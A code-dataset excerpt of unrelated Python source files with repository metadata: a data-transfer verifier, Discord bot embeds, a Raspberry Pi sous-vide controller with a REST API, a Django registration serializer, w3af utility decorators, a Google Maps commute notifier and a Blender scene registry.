] | null | null | null | src/kemokrw/transfer_basic.py | Kemok-Repos/kemokrw | bfe2a82e2ef5d3580ed5dfe65129b30bd3fc4971 | [
"MIT"
] | null | null | null | src/kemokrw/transfer_basic.py | Kemok-Repos/kemokrw | bfe2a82e2ef5d3580ed5dfe65129b30bd3fc4971 | [
"MIT"
] | null | null | null | from kemokrw.transfer import Transfer
class BasicTransfer(Transfer):
"""Clase BasicTransfer implementación de la clase Transfer.
Cumple la función de verficar la compatibilidad de los objetos a transferir,
verifica si ambos extremos son "iguales" y transfiere un los atos de una fuente a la otra.
Atributos
---------
src : pandas.DataFrame Object
dst : pandas.DataFrame Object
max_transfer : int
Métodos
-------
verify():
Verifica si la fuente y el destino son compatibles.
Verifica si el destino es igual a la fuente.
transfer(retires=0):
Tranfiere los datos de la fuente a el destino.
"""
def __init__(self, src=None, dst=None, max_transfer=0):
""" Contruye los atributos necesarios para hacer una transferencia y verifica la compatibilidad de las fuentes.
Parametros
----------
src : pandas.DataFrame Object
Objeto origen resultante de una implementación de la clase Extract.
dst : pandas.DataFrame Object
Objeto destino resultante de una implementación de la clase Load.
max_transfer : int
Máxima cantidad de filas a transferir bajo este método.
Raises
------
Exception
No compatibility found.
"""
self.src = src
self.dst = dst
self.verification = None
self.max_transfer = max_transfer
def verify(self):
"""Verifica la compatibilidad de los objetos a transferir y verifica si el destino es igual a la fuente.
Este metodo utiliza el atributo metadata y la función get_metada() de los objetos src y dst. (Ver documentación)
1. Verifica la compatibilidad del modelo de ambos objetos bajo las siguientes reglas:
- La metadata tiene el mismo número de columnas (metadata[ncols])
- Las columnas de metadata tienen el mismo tipo respectivamente (metadata[columns][colX][type]
2. Verifica si la metadata es igual entre los objetos src y dst para aquellos "keys" de chequeo que se
encuentran en la metadata de ambas objetos.
Raises
------
Exception
No compatibility found.
"""
self.dst.get_metadata() # Actualiza la metadata del objeto destino
# Revisa que la cantidad de columnas sea igual
if self.src.metadata["ncols"] != self.dst.metadata["ncols"]:
raise Exception('No compatibility found. Different number of columns detected')
# Revisa que cada tipo de columna sea igual entre pares
for i in self.src.metadata["columns"]:
if self.src.metadata["columns"][i]["type"] != self.dst.metadata["columns"][i]["type"]:
raise Exception('No compatibility found. {2} "{0}" type do not match "{1}".'.format(
self.src.metadata["columns"][i]["type"], self.dst.metadata["columns"][i]["type"], i))
verification = True
# Revisa el número de filas en cada extremo
if self.src.metadata["check_rows"] != self.dst.metadata["check_rows"]:
verification = False
# Revisa que cada pareja de columnas para revisar los chequeos
if verification:
for i in self.src.metadata["columns"]:
common_params = set(self.src.metadata["columns"][i].keys()) & set(self.dst.metadata["columns"][i].keys())
common_params.discard("subtype")
for j in common_params:
if self.src.metadata["columns"][i][j] != self.dst.metadata["columns"][i][j]:
m = 'La columna {0} no hace match en la verificacion de {1}. {2} != {3}'
print(m.format(i, j, str(self.src.metadata["columns"][i][j])
, str(self.dst.metadata["columns"][i][j])))
verification = False
self.verification = verification
return verification
def transfer(self, retries=0):
"""Tranfiere y verifica los datos del origen al destino.
Este método realiza una verificación de los datos en ambos extremos y si no son iguales intenta transferir
los datos.
Parametros
----------
retries : int
Número de intentos adicionales en caso la verificación falle la primera vez
Raises
------
Exception
Verification failed after transfer.
"""
self.verify()
if not self.verification and self.src.data.empty:
self.src.get_data()
total_tries = 1+retries
n_try = 1
while n_try <= total_tries and not self.verification:
if n_try > 1:
print("Transferring data. Try {0} out of {1}".format(n_try, total_tries))
self.dst.save_data(self.src.data)
self.verify()
n_try += 1
if self.verification:
print('Transfer successful.')
else:
print(self.src.metadata)
print(self.dst.metadata)
raise Exception('Verification failed after transfer. Transfer tried {} times'.format(total_tries))
| 39.469697 | 121 | 0.604798 | 636 | 5,210 | 4.91195 | 0.284591 | 0.033611 | 0.048015 | 0.049296 | 0.254161 | 0.181178 | 0.1242 | 0.056978 | 0.056978 | 0.034571 | 0 | 0.004961 | 0.303647 | 5,210 | 131 | 122 | 39.770992 | 0.856119 | 0.439347 | 0 | 0.125 | 0 | 0.020833 | 0.171574 | 0 | 0 | 0 | 0 | 0.030534 | 0 | 1 | 0.0625 | false | 0 | 0.020833 | 0 | 0.125 | 0.104167 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
95c5f43dbbc13e192693feee3122038d4c144608 | 2,190 | py | Python | responses/test.py | YousefEZ/pydiscord | 56e8715447548ac983c5417a908c8e5ce24c119e | [
"MIT"
] | 3 | 2022-02-20T21:54:31.000Z | 2022-02-20T21:56:30.000Z | responses/test.py | YousefEZ/pydiscord | 56e8715447548ac983c5417a908c8e5ce24c119e | [
"MIT"
] | null | null | null | responses/test.py | YousefEZ/pydiscord | 56e8715447548ac983c5417a908c8e5ce24c119e | [
"MIT"
] | 1 | 2021-03-18T01:01:28.000Z | 2021-03-18T01:01:28.000Z | import sys, inspect
class Tutorial:
flow = "TUTORIAL"
type = "embed"
title = "__TUTORIAL HELP__"
colour = "green"
def __init__(self, player=None):
self.fields = (('Official Discord Server:',
'''
https://discord.com/invite/discord-developers
**-**`tutorial`: :mortar_board: A simple tutorial for how the bot works.
''', False))
self.footer_text = "\u00A9 2018 | Bot"
self.footer_icon = "https://1000logos.net/wp-content/uploads/2020/10/Discord-emblem.jpg"
self.thumbnail = ""
self.image = ""
pointer = None
class P1:
flow = "p1"
type = "menu"
title = "Tutorial HELP CONT.__"
colour = "blue"
def __init__(self, player=None):
self.fields = (("https://discord.com/invite/discord-developers",
"""
https://discord.com/invite/discord-developers """))
self.footer_text = "\u00A9 2018 | Bot"
self.footer_icon = "https://1000logos.net/wp-content/uploads/2020/10/Discord-emblem.jpg"
self.thumbnail = "https://1000logos.net/wp-content/uploads/2020/10/Discord-emblem.jpg"
self.image = ""
pointer = None
class P2:
flow = "p2"
type = " main menu"
title = "__Tutorial HELP__"
colour = "blue"
def __init__(self, player=None):
self.fields = (("Official Discord Server:",
"""
https://discord.com/invite/discord-developers
"""))
self.footer_text = "\u00A9 2018 | Bot"
self.footer_icon = "https://1000logos.net/wp-content/uploads/2020/10/Discord-emblem.jpg"
self.thumbnail = "https://1000logos.net/wp-content/uploads/2020/10/Discord-emblem.jpg"
self.image = "https://1000logos.net/wp-content/uploads/2020/10/Discord-emblem.jpg"
pointer = P1
# Automatically reads and assigns flows.
flows = {}
for a, obj in inspect.getmembers(sys.modules[__name__]):
try:
flows[obj.flow] = obj
except AttributeError:
pass
| 32.686567 | 97 | 0.559361 | 235 | 2,190 | 5.07234 | 0.306383 | 0.050336 | 0.08557 | 0.095638 | 0.717282 | 0.682886 | 0.651007 | 0.651007 | 0.651007 | 0.608221 | 0 | 0.056728 | 0.307763 | 2,190 | 66 | 98 | 33.181818 | 0.729551 | 0.017352 | 0 | 0.413043 | 0 | 0.130435 | 0.380083 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.065217 | false | 0.021739 | 0.021739 | 0 | 0.478261 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
95d6e74ba0cd34cbb9d1e330c81e5f38b7df9b5b | 12,124 | py | Python | sousvide.py | jscuffell/sous-vide | 8de1cb95776ccb20ac9bac953c5f226d0d5f28fa | [
"MIT"
] | null | null | null | sousvide.py | jscuffell/sous-vide | 8de1cb95776ccb20ac9bac953c5f226d0d5f28fa | [
"MIT"
] | null | null | null | sousvide.py | jscuffell/sous-vide | 8de1cb95776ccb20ac9bac953c5f226d0d5f28fa | [
"MIT"
] | null | null | null | import os
import glob
import time
from bottle import Bottle, run, request, response, post, get
import re, json
import RPi.GPIO as GPIO
from lcdtools import LCDDisplay
#import Adafruit_CharLCD as LCD
import threading
import collections
# This script defines the sous vide class, which can interact with the REST API.
class TemperatureSensor:
# Define each temperature sensor in an object. The thermometer deals with all of them at once.
def __init__(self, device_address):
print "Address is " + device_address
os.system('modprobe w1-gpio')
os.system('modprobe w1-therm')
self.base_dir = '/sys/bus/w1/devices/'
self.device_folder = self.base_dir + device_address
self.device_file = self.device_folder + '/w1_slave'
self.device_address = device_address
def __read_temp_raw(self):
f = open(self.device_file, 'r')
lines = f.readlines()
f.close()
return lines
def __read_temp(self):
lines = self.__read_temp_raw()
while lines[0].strip()[-3:] != 'YES':
time.sleep(0.2)
lines = self.__read_temp_raw()
equals_pos = lines[1].find('t=')
if equals_pos != -1:
temp_string = lines[1][equals_pos+2:]
temp_c = float(temp_string) / 1000.0
temp_f = temp_c * 9.0 / 5.0 + 32.0
return round(temp_c, 1)
def getTemperature(self):
return self.__read_temp()
class Thermometer:
def __init__(self, sensor_addresses = []):
self.sensors = {}
for address in sensor_addresses:
self.addSensor(address)
def addSensor(self,device_address):
newSensor = TemperatureSensor(device_address)
self.sensors[device_address] = newSensor
def getSensors(self):
return self.sensors
def getSensorByIndex(self, index):
index = int(index)
return self.sensors[self.sensors.keys()[index]]
def getTemperature(self, withSummary = 0):
returnVal = {}
# Get all the temperatures from the sensors
for address in self.sensors.keys():
returnVal[address] = self.sensors[address].getTemperature()
if withSummary > 0:
summary = {}
summary['mean'] = sum(returnVal.values())/len(returnVal)
summary['min'] = min(returnVal.values())
summary['max'] = max(returnVal.values())
summary['range'] = summary['max'] - summary['min']
returnVal['summary'] = summary
return returnVal
def getAverageTemperature(self):
return self.getTemperature(1)['summary']['mean']
class Thermostat:
def __init__(self):
# Start thermostat at a default temperature. Say - 10 degrees celsius.
self.thermTemp = float(10)
therm = threading.Thread(target=self.thermostatAdjust)
therm.daemon=True
therm.start()
def setThermostat(self, temp):
if (temp > 90):
print "High temperature set and that is not allowed"
raise ValueError
self.thermTemp = float(temp)
# This is picked up by the thermostatAdjust function
return self.thermTemp
def getThermostat(self):
return self.thermTemp
def thermostatAdjust(self):
global thermometer
global heater
tempReadings = collections.deque([], 3)
j = 1 # this is so we don't do anything for the first 3 iterations, so that my collection can fill up
while 1==1:
readings = thermometer.getTemperature(1) # with summary
thermostat = self.getThermostat()
currentTemp = readings['summary']['mean']
tempReadings.append([int(time.time()), currentTemp])
delta = currentTemp - thermostat
print str(delta) + "is delta"
''' if j > 3: # as long as we are three seconds into this
# We will implement a 15 second rule. If, at the current rate, we will reach our temperature in 8 seconds, then slow it down.
print json.dumps(list(tempReadings))
dy_dx = (tempReadings[2][1] - tempReadings[0][1])/(tempReadings[2][0]-tempReadings[0][0])
print "DY_DX = " + str(dy_dx)
if ((currentTemp + 15*dy_dx ) > thermostat): # if we will overshoot thermostatic temperature in the next 15 secnods at this rate:
print "Slowing things down"
# Equally, if the temperature is still less than 2 degrees from correct, then dnon't just turn the bloody thing off
if (delta < -2):
heater.setPower(heater.getPower()-1)
elif (delta > -2) and (delta < -0.7):
heater.setPower(1)
else:
heater.setPower(0)
else:
delta = currentTemp - thermostat
if (dy_dx < -0.005): # if the temperature is coming down rather than up
if (delta < -5):
heater.setPower(3)
elif (delta < -2):
heater.setPower(2)
elif (delta < -0.5 ):
heater.setPower(2)
elif (delta > -0.5):
heater.setPower(0)
else:
if (delta < -5):
heater.setPower(3)
elif (delta < -2):
heater.setPower(2)
elif (delta <= -0.5 ):
heater.setPower(1)
elif (delta > -0.5):
heater.setPower(0)
else:
j = j+1
if (delta < 0):
heater.setPower(3)
else:
heater.setPower(0)
# As we approach the right temperature, start to pulse the element, so it is on less frequently
# if (delta < -5):
# heater.on()
# elif (delta < -2):
# heater.pulse(2,1)
# elif (delta < -0.5):
# heater.pulse(1,2)
# elif (delta < 0):
# heater.off()
# elif abs(delta) <= 0.5:
# heater.off()
# else:
# heater.off() '''
print "Heater state is " + str(heater.getState())
# let's do this a little simpler.
if (delta > 0.5) and (heater.getState() == 1):
heater.setPower(0)
elif (delta < -0.5) and (heater.getState() == 0):
heater.setPower(3)
time.sleep(1)
return
class GPIOTools:
def __init__(self):
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
class GPIOSwitch:
def __init__(self, GPIOPin, inv = 0):
self.pin = GPIOPin
GPIO.setup(self.pin, GPIO.OUT)
self.inv = inv
self.off() # Always start as off
def on(self):
if self.inv == 0:
GPIO.output(self.pin, GPIO.HIGH)
else:
GPIO.output(self.pin, GPIO.LOW)
self.state = 1
return self.state
def off(self):
if self.inv == 0:
GPIO.output(self.pin, GPIO.LOW)
else:
GPIO.output(self.pin, GPIO.HIGH)
self.state = 0
return self.state
def getState(self):
return self.state
def setState(self, newState):
if (newState == 1):
self.on()
else:
self.off()
return self.state
def toggle(self):
self.setState(self.state-1%2)
def LCDDaemon(lcd):
i = 0
while 1==1:
print str(i) +","+json.dumps(thermometer.getTemperature(1))
lcd.setMessage("Temp " + str(thermometer.getAverageTemperature()) + " C" + "\nThermostat " + str(int(thermostat.getThermostat())) + " C")
time.sleep(1)
i = i+1
return
class Heater:
# A class to keep track of all the heaters. In this case we will have one or two, each with their specific BCM number
def __init__(self, gpioPorts = []):
self.gpio = GPIOTools()
self.relays = []
self.state = 0
for port in gpioPorts:
self.addRelay(port)
self.__off()
self.power = 0
def addRelay(self,gpioPort):
self.relays.append(self.gpio.GPIOSwitch(gpioPort))
def __on(self):
for relay in self.relays:
relay.on()
self.state = 1
def __off(self):
for relay in self.relays:
relay.off()
self.state = 0
def setState(self, state):
for relay in self.relays:
relay.setState(state)
self.state = state
def toggle(self):
for relay in self.relays:
relay.toggle()
self.state = self.state-1%2
def getState(self):
return self.state
def setPower(self, power):
# Set the power. 0 is off, 1 is light pulse, 2 is heavy pulse, 3 is continuous operation
if power > 3:
power = 3
if power < 0:
power = 0
self.power = power
if power == 3:
self.__on()
elif power == 2:
self.pulse(2, 1)
elif power == 1:
self.pulse(1, 2)
else:
self.__off()
return
def getPower(self):
return self.power
def pulse(self, time_on, time_off):
self.__on()
time.sleep(time_on)
self.__off()
time.sleep(time_off)
return self.state
heater = Heater([18]) # Put each of the GPIO pins you need in here
thermometer = Thermometer(['28-051685065aff'])
#thermometer = Thermometer(['28-051685065aff', '28-0416847451ff'])
thermostat = Thermostat()
lcd = LCDDisplay()
gpio = GPIOTools()
pumprelay = gpio.GPIOSwitch(19) #for gpio pin 19 being used.
#use pumprelay.on()
#use pumprelay.off()
#use pumprelay.getState()
#use pumprelay.setState(0) #for off
#use pumprelay.setState(1) #for on
LCDDaemon = threading.Thread(target=LCDDaemon,args=(lcd,))
LCDDaemon.daemon=True
LCDDaemon.start()
# Do the REST API bit
app = Bottle()
@app.route('/hello')
def hello():
return "Hello World"
@app.get('/temperature')
def getState():
response.headers['Content-Type'] = 'application/json'
return json.dumps({'temp': thermometer.getAverageTemperature()})
@app.get('/temperature/<sensor>')
def getStateBySensor( sensor = 0):
response.headers['Content-Type'] = 'application/json'
sensors = thermometer.getSensorByIndex(sensor)
temp = thermometer.getTemperature()
return json.dumps({'temp': sensors.getTemperature()})
@app.get('/thermostat')
def getThermostat():
response.headers['Content-Type'] = 'application/json'
return json.dumps({'state': thermostat.getThermostat()})
@app.post('/thermostat')
def setThermostat():
new_temp = float(request.body.read())
print new_temp
try:
new_temp = thermostat.setThermostat(new_temp)
except ValueError:
response.status = 400
return
response.headers['Content-Type'] = 'application/json'
return json.dumps({'state': thermostat.getThermostat()})
@app.get('/heater')
def getHeater():
response.headers['Content-Type'] = 'application/json'
return json.dumps({'state': heater.getState()})
@app.post('/heater')
def changeHeater():
new_state = int(request.body.read())
print new_state
try:
if (new_state > 1) | (new_state < 0):
raise ValueError
except ValueError:
response.status = 400
return
new_state = heater.setState(new_state)
response.headers['Content-Type'] = 'application/json'
return json.dumps({'state': heater.getState()})
run(app, host='192.168.0.37', port=8080)
| 32.074074 | 145 | 0.55353 | 1,385 | 12,124 | 4.771841 | 0.228159 | 0.021788 | 0.008473 | 0.009986 | 0.180965 | 0.16417 | 0.12256 | 0.09941 | 0.094114 | 0.081707 | 0 | 0.026231 | 0.336523 | 12,124 | 377 | 146 | 32.159151 | 0.795375 | 0.083636 | 0 | 0.280488 | 0 | 0 | 0.062323 | 0.002474 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.036585 | null | null | 0.028455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
95d7e5744ff563f245da9ce3b365c3fc78f0624e | 1,863 | py | Python | Accounts/serializers.py | oluwex/quizApp | 069fbc85f1be8768d121728017d07b2c5b17a3c7 | [
"MIT"
] | null | null | null | Accounts/serializers.py | oluwex/quizApp | 069fbc85f1be8768d121728017d07b2c5b17a3c7 | [
"MIT"
] | null | null | null | Accounts/serializers.py | oluwex/quizApp | 069fbc85f1be8768d121728017d07b2c5b17a3c7 | [
"MIT"
] | null | null | null | from django.contrib.auth import get_user_model
from rest_framework import serializers
User = get_user_model()
# class RegisterSerializer(serializers.Serializer):
class RegisterSerializer(serializers.ModelSerializer):
# email = serializers.EmailField(
# label='Email Address',
# max_length=255,
# )
# first_name = serializers.CharField(
# label='First name',
# max_length=255,
# allow_blank=False
# )
# last_name = serializers.CharField(
# label='Last name',
# max_length=255,
# allow_blank=False
# )
password1 = serializers.CharField(
label='Password',
min_length = 6,
write_only = True
)
password2 = serializers.CharField(
label='Confirm password',
min_length = 6,
write_only = True
)
class Meta:
model = User
fields = ['email', 'first_name', 'last_name', 'password1', 'password2',]
# # profile_pic = serializers.ImageField(
# # max_length = 500,
# # allow_empty_file=False
# # )
# def validate_email(self, email):
# strip_email = email.strip()
# if User.objects.filter(email=strip_email) != None:
# raise serializers.ValidationError("Email already exists")
# return strip_email
def validate_password1(self, password):
return password.strip()
def validate(self, data):
if data['password1'] != data['password2']:
raise serializers.ValidationError('The passwords did not match.')
return data
def save(self):
post_data = {
'email': self.validated_data.get('email', ''),
'first_name': self.validated_data.get('first_name', ''),
'last_name': self.validated_data.get('last_name', ''),
'password': self.validated_data.get('password1', '')
}
created_user = User.objects.create_user(
email=post_data['email'],
first_name=post_data['first_name'],
last_name=post_data['last_name'],
password=post_data['password']
)
return created_user | 26.239437 | 74 | 0.695652 | 221 | 1,863 | 5.651584 | 0.316742 | 0.05044 | 0.080064 | 0.064051 | 0.13771 | 0.099279 | 0.099279 | 0 | 0 | 0 | 0 | 0.014175 | 0.166935 | 1,863 | 71 | 75 | 26.239437 | 0.790593 | 0.318304 | 0 | 0.108108 | 0 | 0 | 0.168277 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.081081 | false | 0.297297 | 0.054054 | 0.027027 | 0.324324 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
95dd572af9e83fda3a5895dd0e81d38161367c82 | 5,508 | py | Python | tools/w3af/w3af/core/controllers/misc/decorators.py | sravani-m/Web-Application-Security-Framework | d9f71538f5cba6fe1d8eabcb26c557565472f6a6 | [
"MIT"
] | 3 | 2019-04-09T22:59:33.000Z | 2019-06-14T09:23:24.000Z | tools/w3af/w3af/core/controllers/misc/decorators.py | sravani-m/Web-Application-Security-Framework | d9f71538f5cba6fe1d8eabcb26c557565472f6a6 | [
"MIT"
] | null | null | null | tools/w3af/w3af/core/controllers/misc/decorators.py | sravani-m/Web-Application-Security-Framework | d9f71538f5cba6fe1d8eabcb26c557565472f6a6 | [
"MIT"
] | null | null | null | """
decorators.py
Copyright 2011 Andres Riancho
This file is part of w3af, http://w3af.org/ .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import math
import time
import threading
import collections
import functools
from functools import wraps
import w3af.core.controllers.output_manager as om
# pylint: disable=E0401
from darts.lib.utils.lru import SynchronizedLRUDict
# pylint: enable=E0401
def runonce(exc_class=Exception):
"""
Function to decorate methods that should be called only once.
:param exc_class: The Exception class to be raised when the method has
already been called.
"""
def runonce_meth(meth):
@wraps(meth)
def inner_runonce_meth(self, *args):
if not getattr(self, '_already_executed', False):
self._already_executed = True
return meth(self, *args)
raise exc_class()
return inner_runonce_meth
return runonce_meth
def retry(tries, delay=1, backoff=2, exc_class=None, err_msg='', log_msg=None):
"""
Retries a function or method if an exception was raised.
:param tries: Number of attempts. Must be >= 1.
:param delay: Initial delay before retrying. Must be non negative.
:param backoff: Indicates how much the delay should lengthen after
each failure. Must greater than 1.
:param exc_class: Exception class to use if all attempts have been
exhausted.
:param err_msg: Error message to use when an instance of `exc_class`
is raised. If no value is passed the string representation
of the current exception is used.
"""
if backoff <= 1:
raise ValueError("'backoff' must be greater than 1")
tries = math.floor(tries)
if tries < 1:
raise ValueError("'tries' must be 1 or greater.")
if delay < 0:
raise ValueError("'delay' must be non negative.")
def deco_retry(f):
@wraps(f)
def f_retry(*args, **kwargs):
mtries, mdelay = tries - 1, delay
while mtries >= 0:
try:
rv = f(*args, **kwargs)
except Exception, ex:
# Ok, fail!
if mtries == 0:
if exc_class:
raise exc_class(err_msg or str(ex))
raise
else:
return rv
mtries -= 1
time.sleep(mdelay)
mdelay *= backoff
if log_msg is not None:
om.out.debug(log_msg)
return f_retry
return deco_retry
def cached_property(fun):
"""
A memoize decorator for class properties.
"""
@wraps(fun)
def get(self):
try:
return self._cache[fun]
except AttributeError:
self._cache = {}
except KeyError:
pass
ret = self._cache[fun] = fun(self)
return ret
return property(get)
class memoized(object):
"""
Decorator. Caches a function's return value each time it is called.
If called later with the same arguments, the cached value is returned
(not reevaluated).
"""
def __init__(self, func, lru_size=10):
self.func = func
self.cache = SynchronizedLRUDict(lru_size)
def __call__(self, *args, **kwargs):
if not isinstance(args, collections.Hashable) or\
not isinstance(tuple(kwargs.items()), collections.Hashable):
# uncacheable. a list, for instance.
# better to not cache than blow up.
return self.func(*args, **kwargs)
try:
return self.cache[(args, tuple(kwargs.items()))]
except KeyError:
value = self.func(*args, **kwargs)
self.cache[(args, tuple(kwargs.items()))] = value
return value
def __repr__(self):
"""
Return the function's docstring.
"""
return self.func.__doc__
def __get__(self, obj, objtype):
"""
Support instance methods.
"""
return functools.partial(self.__call__, obj)
def rate_limited(max_per_second):
"""
Decorator that make functions not be called faster than
"""
lock = threading.Lock()
min_interval = 1.0 / float(max_per_second)
def decorate(func):
last_time_called = [0.0]
@wraps(func)
def rate_limited_function(*args, **kwargs):
lock.acquire()
elapsed = time.clock() - last_time_called[0]
left_to_wait = min_interval - elapsed
if left_to_wait > 0:
time.sleep(left_to_wait)
lock.release()
ret = func(*args, **kwargs)
last_time_called[0] = time.clock()
return ret
return rate_limited_function
return decorate | 28.6875 | 79 | 0.599129 | 685 | 5,508 | 4.69781 | 0.366423 | 0.019888 | 0.012119 | 0.017713 | 0.043505 | 0.035426 | 0 | 0 | 0 | 0 | 0 | 0.013896 | 0.320625 | 5,508 | 192 | 80 | 28.6875 | 0.846072 | 0.021968 | 0 | 0.073684 | 0 | 0 | 0.031023 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.010526 | 0.084211 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
95de8be2ae16bb3cf89080daaf0982e968517d26 | 1,662 | py | Python | Notifier.py | xcollantes/commute-ping | 9b12e490fe17c3533f88ead9c5eee545652feafc | [
"Apache-2.0"
] | null | null | null | Notifier.py | xcollantes/commute-ping | 9b12e490fe17c3533f88ead9c5eee545652feafc | [
"Apache-2.0"
] | null | null | null | Notifier.py | xcollantes/commute-ping | 9b12e490fe17c3533f88ead9c5eee545652feafc | [
"Apache-2.0"
] | null | null | null | """Desktop notification system for commuters.
TODO(xcollantes): DO NOT SUBMIT without a detailed description of Notifier.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import subprocess
import requests
from typing import List
from bs4 import BeautifulSoup as bs4
def CallGoogleMaps(home: str, work: str) -> str:
"""Make HTTP request for Maps data.
Args:
home: Home address as string.
work: Work address as string.
Returns:
Raw HTML data.
Raises:
Connection Error.
"""
host = 'https://google.com/maps/dir'
url = host + '/' + home + '/' + work
response = requests.get(url)
response.raise_for_status()
return response.content
def _parse_maps(html:str):
"""Extract useful data from HTML."""
soupy = bs4(html, 'lxml')
first_drive_time = soupy.select("html/body/jsl/div[3]/div[9]/div[8]/div/div[1]/div/div/div[5]/div[1]/div[2]/div[1]/div[1]/div[1]/span[1]")
#first_drive_time = soupy.select("#section-directions-trip-0 > div.section-directions-trip-description > div:nth-child(1) > div.section-directions-trip-numbers > div.section-directions-trip-duration.delay-medium > span:nth-child(1)")
return first_drive_time
def _format_message(maps_data:List) -> None:
pass
def SendNote(message: str) -> None:
"""Runs the message on desktop, keeps visible for 10 seconds."""
subprocess.run(['notify-send', '--expire-time', '10000', f'{message}'])
def main():
home = ''
work = ''
html_response = CallGoogleMaps(home, work)
print(html_response)
#dict_map_data = _parse_maps(html_response)
SendNote("Test Message.")
main()
| 23.742857 | 235 | 0.708183 | 236 | 1,662 | 4.84322 | 0.474576 | 0.017498 | 0.024497 | 0.062992 | 0.043745 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017058 | 0.15343 | 1,662 | 69 | 236 | 24.086957 | 0.795309 | 0.386883 | 0 | 0 | 0 | 0.035714 | 0.191402 | 0.105425 | 0 | 0 | 0 | 0.014493 | 0 | 1 | 0.178571 | false | 0.035714 | 0.25 | 0 | 0.5 | 0.071429 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
95f1aded6d536d23f4607f301e0320036167b1cf | 3,077 | py | Python | src/amira_blender_rendering/scenes/__init__.py | nwaniek/amira_blender_rendering | 4fc971b9e5a0e2f32918baa8353f41ce2ff700b0 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/amira_blender_rendering/scenes/__init__.py | nwaniek/amira_blender_rendering | 4fc971b9e5a0e2f32918baa8353f41ce2ff700b0 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/amira_blender_rendering/scenes/__init__.py | nwaniek/amira_blender_rendering | 4fc971b9e5a0e2f32918baa8353f41ce2ff700b0 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# Copyright (c) 2020 - for information on the respective copyright owner
# see the NOTICE file and/or the repository
# <https://github.com/boschresearch/amira-blender-rendering>.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The scenes module contains scene managers for various setups."""
# base classes
from .basescenemanager import BaseSceneManager # noqa
from .baseconfiguration import BaseConfiguration # noqa
from .threepointlighting import ThreePointLighting # noqa
# composition classes, if inheritance should or cannot be used
from .rendermanager import RenderManager # noqa
# concrete scenes are autoimported later at the end of the file
import os
from functools import partial
from amira_blender_rendering.cli import _auto_import
_available_scenes = {}
def register(name: str, type: str = None):
"""Register a class/function to the specified available type.
This function should be used as a class decorator:
The name should be unique for the scene type that is being registered.
..code::
@register(name='awesome_sauce', type)
class AnotherClass(MyClass):
def __init__(self, ...)
...
Args:
name(str): Name for the scene to register
type(str): Either 'scene' or 'config' depending wheter the actual scene class
or the corresponding configuration class is registered
Returns:
The class that was passed as argument.
Raises:
ValueError: if invalid name/type given.
"""
def _register(obj, name, obj_type):
if obj_type not in ['scene', 'config']:
raise ValueError(f'Requested type {obj_type} is not available')
if name is None:
raise ValueError(f'Provide an appropriate name for the current scene of type {obj.__name__.lower()}')
if name not in _available_scenes:
_available_scenes[name] = dict()
_available_scenes[name][obj_type] = obj
return obj
return partial(_register, name=name, obj_type=type)
def get_registered(name: str = None):
"""
Return dictionary of available classes/function type registered via register(name, type)
Args:
name(str): name of registered object to query
"""
if name is None:
return _available_scenes
if name not in _available_scenes:
raise ValueError(f'Queried type "{name}" not among availables: {list(_available_scenes.keys())}')
return _available_scenes[name]
_auto_import(pkgname=__name__, dirname=os.path.dirname(__file__), subdirs=[''])
